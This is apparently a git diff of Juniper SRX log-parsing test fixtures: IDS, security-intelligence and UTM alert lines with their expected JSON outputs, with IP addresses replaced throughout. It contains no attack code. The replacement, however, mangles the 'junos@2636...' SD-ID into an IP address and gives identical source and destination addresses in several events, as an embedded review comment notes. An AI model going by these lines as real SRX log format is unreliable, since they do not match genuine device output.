@@ -415,17 +438,16 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15" ] }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341263956Z", - "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.1.1.1.2.40 attack-name=\"ICMP fragment!\" source-address=\"1.128.3.4\" destination-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920991600Z", + "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name=\"ICMP fragment!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "fragment_detected", "category": [ @@ -442,34 +464,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -503,17 +531,16 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15" ] }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341267502Z", - "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name=\"Record Route IP option!\" source-address=\"1.128.3.4\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920998Z", + "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Record Route IP option!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "category": [ "network", @@ -529,7 +556,7 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "log": { "level": "error" @@ -537,17 +564,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "country_name": "Norway", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" }, - "ip": "81.2.69.143" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "geo": { @@ -593,8 +617,7 @@ }, "related": { "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "81.2.69.143" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "client": { 
@@ -602,8 +625,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341270408Z", - "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921004100Z", + "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -620,34 +643,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -681,17 +710,17 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.13", + "67.43.156.15" ] }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341273564Z", - "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name=\"Tunnel GRE 4in4!\" source-address=\"1.128.3.4\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921008600Z", + "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 4in4!\" source-address=\"67.43.156.13\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -708,7 +737,7 @@ }, { "server": { - "ip": "1.128.3.4" + "ip": "67.43.156.12" }, "observer": { "name": "rtr199", @@ -728,20 +757,26 @@ }, "related": { "ip": [ - "1.128.3.4" + "67.43.156.12" ] }, "log": { "level": "error" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.12" }, "juniper": { "srx": { 
@@ -753,8 +788,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341276670Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.1.1.1.2.40 attack-name=\"SYN flood!\" destination-address=\"1.128.3.4\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:16:16.921014200Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" destination-address=\"67.43.156.12\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -791,23 +826,29 @@ }, "related": { "ip": [ - "1.128.3.4" + "67.43.156.15" ] }, "log": { "level": "error" }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -819,8 +860,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341279695Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.1.1.1.2.40 attack-name=\"SYN flood!\" source-address=\"1.128.3.4\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:16:16.921018700Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -841,36 +882,18 @@ { "server": { "port": 10778, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 10778, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "source": { "port": 50630, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { 
@@ -901,18 +924,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 50630, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341283102Z", - "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name=\"TCP port scan!\" source-address=\"1.128.3.4\" source-port=\"50630\" destination-address=\"81.2.69.143\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921023300Z", + "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP port scan!\" source-address=\"10.1.1.100\" source-port=\"50630\" destination-address=\"10.1.1.1\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "scan_detected", "category": [ @@ -930,36 +953,18 @@ { "server": { "port": 7, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 7, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "source": { "port": 42799, - "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } - }, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "juniper": { "srx": { 
@@ -990,18 +995,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "10.1.1.100", + "10.1.1.1" ] }, "client": { "port": 42799, - "ip": "1.128.3.4" + "ip": "10.1.1.100" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341286288Z", - "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name=\"FIN but no ACK bit!\" source-address=\"1.128.3.4\" source-port=\"42799\" destination-address=\"81.2.69.143\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921026800Z", + "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"FIN but no ACK bit!\" source-address=\"10.1.1.100\" source-port=\"42799\" destination-address=\"10.1.1.1\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "illegal_tcp_flag_detected", "category": [ diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log index 907187c2cb2..b43a6c7153d 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log 
@@ -1,2 +1,2 @@
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="216.160.83.61" source-port="1" destination-address="216.160.83.57" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="216.160.83.61" source-port="36612" destination-address="216.160.83.57" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="67.43.156.15" source-port="1" destination-address="67.43.156.15" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="67.43.156.15" 
source-port="36612" destination-address="67.43.156.15" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json index 599c2676e26..1857294dc94 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-secintel.log-expected.json @@ -3,48 +3,42 @@ { "server": { "port": 24039, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 24039, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
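Review bot: Both rewritten SECINTEL lines now use `67.43.156.15` for source-address, destination-address and the SD-ID, so the `Tor_Exit_Nodes` blacklist event no longer has an external source distinguishable from its `DMZ` target, the expected output's `related.ip` shrinks to one element, and a swapped source/destination mapping in the pipeline would pass this test. Use two addresses from the supported block, e.g. `source-address="67.43.156.13" destination-address="67.43.156.14"`, so the two ends stay distinct as in the original fixture. The SD-ID `junos@2636.1.1.1.2.129` should be left as it was: 2636 appears to be Juniper's IANA enterprise number, not an IP, and `junos@67.43.156.15` is a form no SRX will produce.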
@@ -85,18 +79,17 @@ }, "related": { "ip": [ - "216.160.83.61", - "216.160.83.57" + "67.43.156.15" ] }, "client": { "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.034353969Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"216.160.83.61\" source-port=\"1\" destination-address=\"216.160.83.57\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", + "ingested": "2021-12-10T10:16:21.215076300Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.15\" source-port=\"1\" destination-address=\"67.43.156.15\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", "kind": "alert", "action": "malware_detected", "category": [ 
@@ -114,48 +107,42 @@ { "server": { "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -204,18 +191,17 @@ "dummy_host" ], "ip": [ - "216.160.83.61", - "216.160.83.57" + "67.43.156.15" ] }, "client": { "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:32.034371021Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"216.160.83.61\" source-port=\"36612\" destination-address=\"216.160.83.57\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", + "ingested": "2021-12-10T10:16:21.215086900Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"67.43.156.15\" source-port=\"36612\" destination-address=\"67.43.156.15\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", "kind": "alert", "action": "malware_detected", "category": [ diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log index 2e833e5324c..5ba1c282674 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log 
+++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-utm.log 
@@ -1,12 +1,12 @@
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="1.128.3.4" source-port="58071" destination-address="175.16.199.1" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address="1.128.3.4" source-port="1402" destination-address="175.16.199.1" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
-<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
-<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="1.128.3.4" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
-<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="1.128.3.4" source-port="58071" destination-address="175.16.199.1" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
-<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address="1.128.3.4" source-port="58071" destination-address="175.16.199.1" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="1.128.3.4" source-port="58974" destination-address="175.16.199.1" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
-<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="1.128.3.4" source-port="59075" destination-address="175.16.199.1" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
-<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="1.128.3.4" source-port="80" destination-address="175.16.199.1" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address="10.10.10.50" source-port="1402" destination-address="67.43.156.13" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="67.43.156.12" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address="67.43.156.14" source-port="80" destination-address="67.43.156.12" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
+<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address="10.2.1.101" source-port="80" destination-address="67.43.156.12" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
+<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
+<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.168.2.3" source-port="58071" destination-address="192.168.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
